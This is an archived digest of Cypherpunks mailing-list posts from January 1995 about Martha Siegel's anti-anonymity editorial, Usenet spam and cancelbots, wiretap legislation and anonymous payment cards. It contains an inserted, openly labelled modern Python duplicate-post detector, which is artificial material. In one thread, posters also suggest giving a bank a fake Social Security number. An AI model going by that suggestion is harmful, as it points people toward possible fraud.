~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From asgaard at sos.sll.se Tue Jan 3 11:05:37 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Tue, 3 Jan 95 11:05:37 PST
Subject: Press attack on anonymity.
In-Reply-To:
Message-ID:

James A. Donald wrote:

> higher authority of which I spoke earlier -- who is
> anonymously attacking anonymity.
> the government speaking -- a government department with guns is
> running up a trial balloon.

Expected and hardly anything to go into public dispute about. Cypherpunks are here to circumvent the measures of various governments by technical means. Since Joe User doesn't really care if he can connect anonymously or not, at least not yet, they might very well succeed in making some aspects of anonymity 'illegal'. But who cares, if anonymous agents can't be traced?

Mats

From quester at eskimo.com Tue Jan 3 11:28:50 1995
From: quester at eskimo.com (Charles Bell)
Date: Tue, 3 Jan 95 11:28:50 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID:

The author of this editorial is the Siegel of Canter and Siegel fame, nicht wahr?
Perhaps someone with detailed knowledge of that brouhaha should write the Examiner and point out that they allowed their editorial page to be used for ex parte pleading by one of the worst offenders in the history of the Internet -- and without informing their readers they were doing so.

From jeffb at sware.com Tue Jan 3 11:38:29 1995
From: jeffb at sware.com (Jeff Barber)
Date: Tue, 3 Jan 95 11:38:29 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID: <9501031929.AA13882@wombat.sware.com>

Sandy Sandfort writes (quoting SF Chronicle article):

[ Much bs elided ]

> Martha S. Siegel is the author of ``How to Make a Fortune on the
> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.

Isn't this the Siegel of the infamous "Canter and Siegel"?

-- Jeff

From mclow at coyote.csusm.edu Tue Jan 3 11:42:04 1995
From: mclow at coyote.csusm.edu (Marshall Clow)
Date: Tue, 3 Jan 95 11:42:04 PST
Subject: SAN FRANCISCO EDITORIAL
Message-ID:

Sandy wrote:
>C'punks,
>
>Here is a guest editorial that ran in Monday's SF Chronicle. It
>should make your blood boil.
>
[ ranting gibberish deleted ]
>
>Martha S. Siegel is the author of ``How to Make a Fortune on the
>Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.
>

Not _the_ Martha Siegel, of Canter & Siegel, targets of fine cancelbots everywhere?

-- Marshall

Marshall Clow
Aladdin Systems
mclow at coyote.csusm.edu

From unicorn at access3.digex.net Tue Jan 3 11:55:53 1995
From: unicorn at access3.digex.net (Black Unicorn)
Date: Tue, 3 Jan 95 11:55:53 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID:

On Tue, 3 Jan 1995, Sandy Sandfort wrote:

> Date: Tue, 3 Jan 1995 10:58:09 -0800 (PST)
> From: Sandy Sandfort
> To: Cypherpunks
> Subject: SAN FRANCISCO EDITORIAL
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
> C'punks,
>
> Here is a guest editorial that ran in Monday's SF Chronicle. It
> should make your blood boil.
>
>
> S a n d y
>
> * * *
>
> ANARCHY, CHAOS ON THE INTERNET MUST END

[Trash about mob rule, and the need for international diplomacy (Read U.S. imposition of local law to foreign sovereigns) to correct the problem, happily deleted.]

>
> Martha S. Siegel is the author of ``How to Make a Fortune on the
                                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Information Superhighway'' and CEO of Cybersell in Scottsdale, Ariz.
  ^^^^^^^^^^^^^^^^^^^^^^^^              ^^^^^^^^^

I guess anonymous posting abilities just kill the internet direct mail business hmmmm?

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!

From paul at poboy.b17c.ingr.com Tue Jan 3 12:04:13 1995
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Tue, 3 Jan 95 12:04:13 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID: <199501032006.AA04977@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

Despite the odiousness of the source, might it be a Good Thing to get a law giving ISPs common-carrier status passed? When you're a common carrier, no one hassles you about the content you pass-- this would make it much easier for anon remailers to flourish.

- -Paul

- --
Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the
perobich at ingr.com | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwmuSafb4pLe9tolAQF/EwQAkaG3Aeg5NRAXtlC7EkhQz1iONk0cBFSA
a8CS+w0MgIK2ZpdQRfXDQuBrZ1Mowx1OTEaw4pZayIomFWAb1D4Kkdi8NKgBN53C
Y4T8KEri2xSP3MESjKGcqw8p8ps/8W4ylGw2xyatIq8GWilNb9DHe5Y+/fxCkcyg
aONdWuogsQE=
=dYl4
-----END PGP SIGNATURE-----

From hayden at krypton.mankato.msus.edu Tue Jan 3 12:11:05 1995
From: hayden at krypton.mankato.msus.edu (Robert A.
Hayden)
Date: Tue, 3 Jan 95 12:11:05 PST
Subject: Stegno for Kids
In-Reply-To: <9501031834.AA21554@elysion.iaks.ira.uka.de>
Message-ID:

On Tue, 3 Jan 1995, Hadmut Danisch wrote:

> I had something like that as a toy about 20 years ago. A single pen with
> tips on both sides. One to write, the other to develop. Didn't they have it
> in America also?

There was also this thing where you would get these books and a magic marker, and then you would do puzzles in the book, and use the pen to develop the answer. The old Infocom hint books also used a similar setup.

____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu
\ /__ -=-=-=-=- <=> -=-=-=-=-
\/ / Finger for Geek Code Info <=> All I want is a cure...
\/ Finger for PGP Public Key <=> And all my friends back!

From dcwill at python.ee.unr.edu Tue Jan 3 12:55:30 1995
From: dcwill at python.ee.unr.edu (Dr. D.C. Williams)
Date: Tue, 3 Jan 95 12:55:30 PST
Subject: Press attack on anonymity.
Message-ID: <199501032101.QAA27544@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
- From dcwill at python.ee.unr.edu Tue Jan 3 11:52:23 1995
From: "Dr. D.C. Williams"
Message-Id: <199501031952.LAA04685 at python.ee.unr.edu>
Subject: Re: Press attack on anonymity.
To: asgaard at sos.sll.se (Mats Bergstrom)
Date: Tue, 3 Jan 1995 11:52:15 -0800 (PST)
Cc: dcwill at python.ee.unr.edu (Dr. D.C. Williams, P.E.)
In-Reply-To: from "Mats Bergstrom" at Jan 3, 95 08:05:49 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 842

Mats Bergstrom wrote:

> Since Joe User doesn't really
> care if he can connect anonymously or not, at least not yet,
> they might very well succeed in making some aspects of anonymity
> 'illegal'. But who cares, if anonymous agents can't be traced?

Because then the last, unstoppable act of the State will be to clamp down on anonymous agents. See "How to Boil Live Frogs".
You can't dump them into boiling water because they will jump out. Instead, start at a comfortable temperature and turn up the heat a little bit at a time. Eventually, the frogs become unable to escape and are lulled to their unconscious death. I equate "making some aspects 'illegal'" with increasing the water temperature.

To paraphrase an oft-seen .sig from this list: "Seldom is freedom of any kind lost all at once."

=D.C. Williams

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwm6/ioZzwIn1bdtAQGuRwGAobH2lCXDIHUCitG1mcI0RasjMOWjovT2
xUpa1Xta/mphm/s+2H21f7kuFvY6smcn
=wclb
-----END PGP SIGNATURE-----

From koontz at MasPar.COM Tue Jan 3 13:44:53 1995
From: koontz at MasPar.COM (David G. Koontz)
Date: Tue, 3 Jan 95 13:44:53 PST
Subject: Press attack on anonymity.
Message-ID: <9501032146.AA19980@argosy.MasPar.COM>

Sandy Sandfort posted an editorial from Monday's SF Chronicle. There is a front page story in today's San Jose Mercury News on why anonymity is a bad thing. It's from a New York Times story by Peter H. Lewis.

The question is who launched all this stuff?

From sandfort at crl.com Tue Jan 3 13:47:13 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 13:47:13 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 3 Jan 1995, Charles Bell and several others wrote along these lines:

> The author of this editorial is the Siegel of Canter and Siegel fame,
> nicht wahr?
>
> Perhaps someone with detailed knowledge of that brouhaha should write the
> Examiner and point out that they allowed their editorial page to be used
> for ex parte pleading by one of the worst offenders in the history of the
> Internet -- and without informing their readers they were doing so.

Gosh, my education seems to be remiss with regard to the case/incidents referred to. Could someone let us know who this person is and what her claim to fame is? (It certainly isn't her logic or writing ability.)

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From marsha-w at uiuc.edu Tue Jan 3 13:52:15 1995
From: marsha-w at uiuc.edu (Marsha-W)
Date: Tue, 3 Jan 95 13:52:15 PST
Subject: LAW AND ETHICS ON THE "NETS"
Message-ID:

Looks like more of a push for regulation: Charles Bell thought you all might have something to say about this...

------------------------------------------------------------------------------

ABA SCI/TECH SECTION, IPPP COMMITTEE
LAW AND ETHICS ON THE "NETS"
December 8, 1994

The John Marshall Law School's Center for Informatics Law, in conjunction with the ABA Section of Science & Technology Committee on Information Practices, Policies, and Privacy, is undertaking a project entitled, "Law and Ethics on the 'Nets'" (LEON).

The development of a national information infrastructure and a global electronic network, of which Internet is the backbone, has presented a multitude of legal and ethical problems involving use and abuse of the networks, nationally and worldwide. Almost on a daily basis, news items announce electronic network transmissions constituting hate mail, profanity, vulgarity, obscenity, child pornography, sexual harassment, defamation and invasion of privacy. The violation of intellectual property rights and information system security are also frequent occurrences.
National and international discussions consider such questions as what "rules of the road" ought to apply, who can make them, how can they be enforced, and what will be the legal and political relationships between states and nations regarding cyberspace? It is argued that at present the lawless, the intolerant and the disrespectful seem able to pollute the worldwide information stream with little constraint.

Certainly, the current state of anarchy in national and global electronic networks cannot continue if the technology is to achieve the remarkable benefits that have been predicted in terms of communications among institutions and individuals, whether government, business or society at large. The purpose of the CIL/S&T project is to promote a dialogue that can lead to recommendations for treating with the many issues at hand.

We solicit the participation of the Sci/Tech IPPP Committee (and interested others!) in addressing the foregoing issues. Please send me your expression of interest -- indicating what specific aspects of the various questions you would like to address, and then I'll organize us into some working groups.

PLEASE LET ME KNOW YOUR INTERESTS BY JANUARY 9, 1995, SO WE CAN STRUCTURE THE PROJECT AND PROMPTLY GET UNDER WAY. We plan a program on the project for the ABA annual meeting in Chicago next August, and we hope to generate a publication for the Section concerning the project results.

George B. Trubow, Professor of Law
Director, Center for Informatics Law
The John Marshall Law School
315 S. Plymouth Ct.
Chicago, IL 60604-3907
Fax: 312-427-8307; Voice: 312-987-1445
E-mail: 7trubow at jmls.edu

Marsha Woodbury
marsha-w at uiuc.edu
U of Illinois/Urbana-Champaign
FAX 217-356-7050
Home 217-337-0001
Work 217-244-0780
http://www.cpsr.org/dox/global.html

From perry at imsi.com Tue Jan 3 14:01:58 1995
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 3 Jan 95 14:01:58 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To:
Message-ID: <9501032202.AA13835@snark.imsi.com>

Sandy Sandfort says:
> Gosh, my education seems to be remiss with regard to the case/
> incidents referred to. Could someone let us know who this person
> is and what her claim to fame is? (It certainly isn't her logic
> or writing ability.)

Martha is a de facto disbarred attorney, who, along with her equally slimy hubby, also a de facto disbarred attorney (both resigned from the Florida bar for ethical violations rather than be disbarred), began posting to every group on Usenet a scummy ad explaining that if people would only pay them a bunch of money they would file entries into last year's green card lottery for their clients, who, of course, could have simply sent their letters in on their own for free.

The net reacted rather violently to their spamming, because unlike most rational individuals they contended that they were doing something perfectly decent and honest. People stopped them in the long run by rigging up cancelbots to administer the Usenet death penalty to them.

No one would be giving them a shred of respect, except for the fact that a certain New York Times reporter named Peter Lewis appeared to miss the point in certain articles he published about the incident.

Perry

From speed at cs.washington.edu Tue Jan 3 14:17:58 1995
From: speed at cs.washington.edu (Erik Selberg)
Date: Tue, 3 Jan 95 14:17:58 PST
Subject: SAN FRANCISCO EDITORIAL
Message-ID: <199501032218.OAA03693@meitner.cs.washington.edu>

> C'punks,
>
> Here is a guest editorial that ran in Monday's SF Chronicle. It
> should make your blood boil.
>
>
> S a n d y
>
> * * *
>
> ANARCHY, CHAOS ON THE INTERNET MUST END

Yup, it's the same net-spamming Siegel, arguing for:

  End of mob rule, so she can advertise everywhere for free;
  End of anonymous encryption, so we can't send plans for the new stealth basselope to the commies (or I guess it's liberals, nowadays).
  End of anonymous mail, so she can tell back at all those who yell at her for spamming
  Terms of surrender for us academic types, who only exist to attack business people (and, if you're at CMU, check out the nudie pics)
  End of private providers yanking abusers' accounts

basically, a nice editorial which sugar-coats what she wants, which is the ability to send out what she wants, ensure that it gets to everyone she sends it to, and not worry about flames or getting the boot.

What's scary is that it's very easy to slide this kind of stuff onto an ignorant and conservative legislature. Big leaders who want to do good see an obvious good side to removing the ability to post anonymously --- law enforcement can track people making drug transactions, and if someone broadcasts a nudie pic found to be obscene in TN, well hey, they can now haul his ass to TN for some jail time. It's going to take a lot of lobbying to ensure that this doesn't happen.

work: (206) 543-7798    Erik Selberg
play: (206) 517-3039    speed at cs.washington.edu
I get by with a little help from my friends...

From sandfort at crl.com Tue Jan 3 14:33:58 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 14:33:58 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To: <9501032202.AA13835@snark.imsi.com>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Oh, THAT Canter and Siegel.

If someone with the facts (Perry?) is so inclined, a letter to the editor would be in order. These scum bags need to be exposed.
The address is:

 San Francisco Chronicle
 5th and Mission
 San Francisco, CA 94103

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From sandfort at crl.com Tue Jan 3 14:34:18 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 3 Jan 95 14:34:18 PST
Subject: LAW AND ETHICS ON THE "NETS"
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Thanks to Marsha-W for telling us about the "Law and Ethics on the 'Nets'" project being organized at the John Marshall Law School. I'm signing up. I think ALL of us should, if you get my drift.

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From nesta at nesta.pr.mcs.net Tue Jan 3 14:37:58 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Tue, 3 Jan 95 14:37:58 PST
Subject: calls for regulation
In-Reply-To:
Message-ID:

This is pretty scary, I mean it always sat in the back of my mind that they would attempt to regulate the net, and to pass legislation and all, but now that it is rearing its head and looks like there is going to be a push for it, I am actually concerned, to the point of fear almost. Not a paralyzing fear, but a definite feeling that action is necessary now to either head it off, or provide for alternative forms of communication on the Net if it does come. Thank goodness the cypherpunks have been working on crypto, it is at least deployed enough now that any attempt to control that would entail drastic measures, like REALLY drastic.

I think perhaps we should make a concerted effort to alert the rest of the net of these happenings, and to tell them to contact their legislators and such to try and stop it, or at least attempt to stop the hystericism that these articles will drum up in congress.
Perhaps someone will be kind enough to write "newsletter" or a post to be spread throughout usenet and other BBS's and mailing lists(under control, not spamming or anything) that alerts people on what is happening, and what they can do about it. I am afraid I am too inexperienced as a writer of such things, I could do it, but i am sure that others here would do much better jobs of it, and thus influence more action from the people on the net.

get on your boots fellas, load your guns too. Looks like a war is starting up, or is it a police action 8)

i want to know everything               http://www.mcs.com/~nesta/home.html
i want to be everywhere                 Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters     /-/ a s t e zine

From hfinney at shell.portal.com Tue Jan 3 14:44:36 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 3 Jan 95 14:44:36 PST
Subject: San Francisco Editorial
Message-ID: <199501032244.OAA15281@jobe.shell.portal.com>

Another point re Canter and Siegel is that there is now a service calling itself CancelMoose which goes through Julf's anon server in Finland (anon.penet.fi) to cancel spams. (Spams are off-topic, nearly-identical posts to large numbers of groups.) This is what Siegel is really upset about. She and her husband are publishing a book telling businesses how they can use spam posts on usenet as free advertising. But now CancelMoose is a relatively accepted counter to these increasingly-frequent spams (pyramid schemes, etc.). This makes their book obsolete and really hits them where it hurts. But they can't sue CancelMoose because its identity is hidden.

Personally, I don't like the idea of cancelling other people's posts, spam or not. I would rather see news readers enhanced to detect copies of posts I have already seen and delete them. The awful thing about Canter and Siegel's Green Card spam was that they didn't cross-post, they used a bot to individually post to all groups. I was shown their message headers for days. Ordinary off-topic posts don't bother me much because I can ignore them easily. With a better newsreader the Green Card spam would have been equally trivial to ignore.

The scary thing about cancels is that some proposals have actually been directed at anonymous posts themselves. Someone anonymously posted what purported to be a grisly transcript of the last seconds of the doomed Challenger crew as they fell to the ocean. This caused a great hue and cry and some calls for banning anonymous posts and/or retroactively cancelling them. This led to some very amusing events which Detweiler has chronicled in his FAQ on anonymity, the net result of which was that the idea was discredited. But the emergence of CancelMoose is not an altogether positive event in my view.

From ben at Tux.Music.ASU.Edu Tue Jan 3 14:45:02 1995
From: ben at Tux.Music.ASU.Edu (Ben Goren)
Date: Tue, 3 Jan 95 14:45:02 PST
Subject: Stegno for Kids
In-Reply-To:
Message-ID:

Lemon juice makes a good invisible ink for kids. Write the message; heat the paper to reveal it. I used a match, but I suspect a hairdryer would be much more sensible.

b&

From aarach01 at barney.poly.edu Tue Jan 3 15:01:47 1995
From: aarach01 at barney.poly.edu (Arsen Arachelian)
Date: Tue, 3 Jan 95 15:01:47 PST
Subject: rarachel - no email
Message-ID:

Hey guys,

It's me. Don't let the new account name, and the horrible name of this despicable machine throw you off. It's me, Ray Arachelian. Some rat(s?) hacked into photon, the machine where my home account lives, and now, while I can read my prism email by going through major acrobatic maneuvers, I have to use this slimy shitty student account.
So for the time being, please direct any mail to this account aarach01 at barney.poly.edu (God I hate this machine's name!)

I'll still be able to read anything you send to prism for the time being (during winter recess they said.) See, I have to log in to barney, ftp my mailbox over from prism, telnet to barney and delete my mailbox, and then read it with pine... :-(

[Eileen, could you at least build a home directory for my old account with a .forward to Barney for now? Or just let me use prism without having to have photon connected to it?]

Thanks,
-- Ray (Arsen) Arachelian.
[also known as rarachel at prism/photon.poly.edu, RayDude at aol.com, etc.]

From aarach01 at barney.poly.edu Tue Jan 3 15:06:31 1995
From: aarach01 at barney.poly.edu (Arsen Arachelian)
Date: Tue, 3 Jan 95 15:06:31 PST
Subject: Comdex Disks?
In-Reply-To: <199412272331.AA09920@metronet.com>
Message-ID:

On Tue, 27 Dec 1994, David K. Merriman wrote:

> Back some time ago, there was some discussion of giving away disks at Comdex
> in NY; by any chance, does anyone have a copy of the contents of what was on
> those disks? I'd like to be able to give away 'basic info' in
> easy-to-handle format :-)

That was my puppy. My friend Sal at panix and I gave the disks away at PC-EXPO and at various other events. I have the latest disk version of it if you want it, but you'll need to update PGP on the disk and maybe include/add/remove some articles from the articles package.

You can call me at 212-618-8818 (work) or email me here, but with the situation with my account, call me instead. (And that goes for anyone else on the list willing to send diskettes out. Please don't call me if you aren't going to give out disks and are just interested in a copy. You can ftp the old copies from somewhere in Canada...)
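Hal's message earlier in this digest asks for newsreaders that detect copies of posts already seen, and notes that the Green Card posts were sent individually to each group rather than cross-posted, so a Message-ID check alone would not catch them. The following is an added example (not code from the list or from any newsreader): it marks a repeated Message-ID as a cross-post and uses a normalized body digest plus word-shingle overlap to catch separately posted copies. The articles, the shingle size and the threshold are constructed for illustration.

```python
import hashlib
import re
from email import message_from_string

SHINGLE = 4       # words per shingle (assumed value)
THRESHOLD = 0.8   # Jaccard overlap treated as "same post" (assumed value)


def body_words(body):
    """Words of the body, ignoring case, layout, quoted lines and the signature."""
    kept = []
    for line in body.splitlines():
        if line.rstrip() == "--":              # "-- " signature separator
            break
        if not line.lstrip().startswith(">"):  # skip quoted text
            kept.append(line)
    return re.findall(r"[a-z0-9']+", " ".join(kept).lower())


def shingles(words, k=SHINGLE):
    """Set of overlapping k-word runs; survives small insertions in the text."""
    if len(words) <= k:
        return {" ".join(words)}
    return {" ".join(words[i:i + k]) for i in range(len(words) - k + 1)}


class SeenPosts:
    """Remembers what the reader has been shown and classifies new arrivals."""

    def __init__(self):
        self.ids, self.digests, self.shingle_sets = set(), set(), []

    def classify(self, raw_article):
        msg = message_from_string(raw_article)
        msg_id = msg.get("Message-ID", "").strip()
        if msg_id and msg_id in self.ids:
            return "crosspost"                 # same article, another group
        if msg_id:
            self.ids.add(msg_id)
        words = body_words(msg.get_payload())
        if not words:                          # nothing to fingerprint
            return "new"
        digest = hashlib.sha256(" ".join(words).encode()).hexdigest()
        if digest in self.digests:
            return "copy"                      # new Message-ID, same text
        sh = shingles(words)
        for old in self.shingle_sets:
            if len(sh & old) / len(sh | old) >= THRESHOLD:
                return "near-copy"             # same text with small edits
        self.digests.add(digest)
        self.shingle_sets.append(sh)
        return "new"


# Constructed sample text, not the wording of any real post.
AD = ("Constructed sample advertisement. Our office will prepare and file "
      "your lottery entry for a fee. Reply by mail for a price list and an "
      "application form. This offer is open to readers in every country.")


def article(msg_id, group, body):
    return (f"Message-ID: <{msg_id}@example.invalid>\n"
            f"Newsgroups: {group}\nSubject: sample\n\n{body}\n")


def demo():
    seen = SeenPosts()
    feed = [
        article("1", "misc.test", AD),
        article("1", "alt.test", AD),          # same article via a second group
        article("2", "rec.gardens",
                AD.upper().replace(". ", ".\n  ") + "\n-- \nconstructed signature"),
        article("3", "sci.crypt", AD + "\nPosted for sci.crypt readers."),
        article("4", "sci.crypt",
                "Has anyone timed key generation for 512 and 1024 bit keys "
                "on a 486? Mine takes about four minutes."),
    ]
    return [seen.classify(a) for a in feed]


if __name__ == "__main__":
    print(demo())
```

The third and fourth articles carry fresh Message-IDs, which is the case Hal describes; only the content fingerprint ties them to the first.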
From raph at netcom.com Tue Jan 3 16:59:09 1995
From: raph at netcom.com (Raph Levien)
Date: Tue, 3 Jan 95 16:59:09 PST
Subject: Siegel and Lewis
Message-ID: <199501040022.QAA21291@netcom17.netcom.com>

I just got off the phone with Peter Lewis, reporter for the New York Times. He is unaware of any grand conspiracy to regulate the Net, but then again if there was one, I don't think they'd tell him. His piece that ran Saturday was badly mangled by the editorial process, especially since it ran on page one. Those articles get to be mangled by a whole new set of people who otherwise wouldn't get to touch it. I think Lewis has basically good intentions, and does do his homework before writing a story.

Yecchh. Now I know why I don't rely on daily newspapers for my news (the Internet keeps me up on the fast-breaking stuff, and the Economist fills me in on the rest). The fact that most people rely on papers and the even worse TV news does not bode well.

Martha Siegel is just fucked up enough that she will probably push for legislation regulating the nets. Congress is just fucked up that they might pass it.

Raph

From blane at seanet.com Tue Jan 3 17:24:48 1995
From: blane at seanet.com (Brian Lane)
Date: Tue, 3 Jan 95 17:24:48 PST
Subject: Anonymous payment scheme
In-Reply-To: <199501031745.JAA09281@jobe.shell.portal.com>
Message-ID:

On Tue, 3 Jan 1995, Hal wrote:

> > I don't see why a debit card couldn't be anonymous, even to the point
> > of having no name, AND no picture on it. Yes, the bank has the money, but
> > their only obligation is to dish it out to the vendors/ATMs that you have
> > used your card with. Why should a bank care who you are once they have
> > your money in the account.
>
> Again, it is unclear here whether you are proposing that you would be
> anonymous to the bank or just have a blank card. As I wrote, banks are

I'm aiming towards anonymous from everyone. The vendor, and the bank.
> required to get SS#'s for depositors right now, and I wouldn't expect
> that to change any time soon. If anything, the trend appears to be
> towards more tightening rather than less. Duncan and/or Sandy have
> suggested giving a fake SS# when you open your secured account; maybe
> that would be legal but it sounds questionable to me.

I guess I'm being a little too unrealistic about my wishes. In my ideal case the IRS and the government would have nothing to do with the bank. Fake SS# is a good idea, but no one seems to know exactly how legal this is. They could, for example, claim that you were trying to defraud the bank and/or the IRS.

> I used my VISA yesterday, and after swiping it through the now-ubiquitous
> card readers the vendor was required by the machine to manually enter the
> last four digits on the card. He complained that this was something new
> and was happening very frequently now (maybe a change with 1995?). I

I hadn't heard of this. It's been a couple of years since I've had a VISA card.

> have heard of fraud where people make fake VISA cards (or steal them) and
> re-program the mag stripe to have a different number than what is on the
> front. Maybe this is a countermeasure for that. It doesn't sound like a
> blank card is the direction the industry is going. Does anyone have more
> info on this change?

That's why I suggested the blank card(no embossing). Without that it makes it more difficult to get your card number. I envision a transaction like so:

1. Card is swiped and the database is checked for your card # and enough balance for the purchase.
2. If authorized, a receipt is printed without card #.

To get your card # the criminal has to either intercept the transaction with the database(not too hard), or compromise the database itself. As long as you keep your card physically secure you should be reasonably secure.

Brian

P.S. I apologize for any misspellings or missing chars.
My ISP(seanet.com) misses incoming characters when more than 3 sz sessions are running.

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key." | finger blane at seanet.com
 -- Journey | PGP 2.6 email accepted
------------------------------------------------------------------------------

From pstemari at erinet.com Tue Jan 3 17:48:08 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:08 PST
Subject: Anonymous payment scheme
Message-ID: <9501040140.AB27685@eri.erinet.com>

At 09:45 AM 1/3/95 -0800, Hal wrote:
> ... As I wrote, banks are
>required to get SS#'s for depositors right now, and I wouldn't expect
>that to change any time soon. If anything, the trend appears to be
>towards more tightening rather than less. ...

Isn't that only a requirement on interest-bearing, or potentially interest-bearing, accounts?

 --Paul J. Ste. Marie
 pstemari at well.sf.ca.us, pstemari at erinet.com

From pstemari at erinet.com Tue Jan 3 17:48:13 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:13 PST
Subject: Anonymous payment scheme
Message-ID: <9501040140.AA27685@eri.erinet.com>

At 08:16 AM 1/3/95 -0500, Robert Hettinga wrote:
>Hmmm. What if you produced a pseudonym card *with* your picture on the
>front? I smell a market opportunity. Or not...

You'd need to prominently state on the front "not to be used for id" or some such. Otherwise you could potentially get nailed for issuing fraudulent identity documents. Too many places think that a MC/Visa is a form of id.

 --Paul J. Ste. Marie
 pstemari at well.sf.ca.us, pstemari at erinet.com

From lile at art.net Tue Jan 3 17:49:51 1995
From: lile at art.net (Lile Elam)
Date: Tue, 3 Jan 95 17:49:51 PST
Subject: Press attack on anonymity.
Message-ID: <199501040143.RAA22066@art.net>

Or perhaps it is someone at HotWired...
:)

-lile

From VAMAGUS at delphi.com Tue Jan 3 18:16:11 1995
From: VAMAGUS at delphi.com (VAMAGUS at delphi.com)
Date: Tue, 3 Jan 95 18:16:11 PST
Subject: H.R.4922
Message-ID: <01HLF9W9HYG2938CN8@delphi.com>

If I am digging up old info please excuse me, I haven't been able to read the majority of mail due to the volume of, fluff, shall we say.

For U.S. cypherpunks this is it:
H.R. 4922 "Interception of Digital and Other Communications" passed as of October. This is the first *I* heard about it.
In short the bill requires:
" ...telecommunications carrier shall insure that its equipment, facilities, or services are capable of (1) expeditiously isolating and enabling the government, pursuant to a court order or other authorization, to intercept, to the exclusion of all other communications, all wire and electronic communications carried by the carrier....etc.

Time for me to generate more keys!

More info available at:
ftp.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill
gopher.eff.org /1/EFF/Policy/Digital_Telephony/digtel94.bill
http.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill

***************************Frenchie Sends*******************************
* PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. *
* As soon as any man says of the affairs of the state *
* "What does it matter to me?" the state may be given up for lost. *
* J.J.Rousseau - The Social Contract *
* PGP info: email to mail-server at rtfm.mit.edu with first line: *
* send pub/usenet/alt.security.pgp/* *
*****************************J. Francois********************************

From roy at cybrspc.mn.org Tue Jan 3 18:31:51 1995
From: roy at cybrspc.mn.org (Roy M.
Silvernail)
Date: Tue, 3 Jan 95 18:31:51 PST
Subject: SAN FRANCISCO EDITORIAL
In-Reply-To: <199501032006.AA04977@poboy.b17c.ingr.com>
Message-ID: <950103.173130.6M1.rusnews.w165w@cybrspc.mn.org>

In list.cypherpunks, perobich at ingr.com writes:

> Despite the odiousness of the source, might it be a Good Thing to get
> a law giving ISPs common-carrier status passed?
>
> When you're a common carrier, no one hassles you about the content you
> pass-- this would make it much easier for anon remailers to flourish.

I can't speak for ISPs in general, but when I still ran a public-access system, the absolute last thing I wanted was to be thought of as a common carrier. While common carriers are held blameless for the content of traffic they pass, they are also heavily regulated. In general, a common carrier may not refuse to provide services unless special circumstances exist. Want to bet Usenet abuse won't be one of those circumstances?

Spammers would love such a state of affairs. (and remember who wrote that whine) I'm for keeping regulation out of the Inet whenever and wherever possible.

--
Roy M. Silvernail [ ] roy at cybrspc.mn.org
PGP public key available by mail
echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org
These are, of course, my opinions (and my machines)

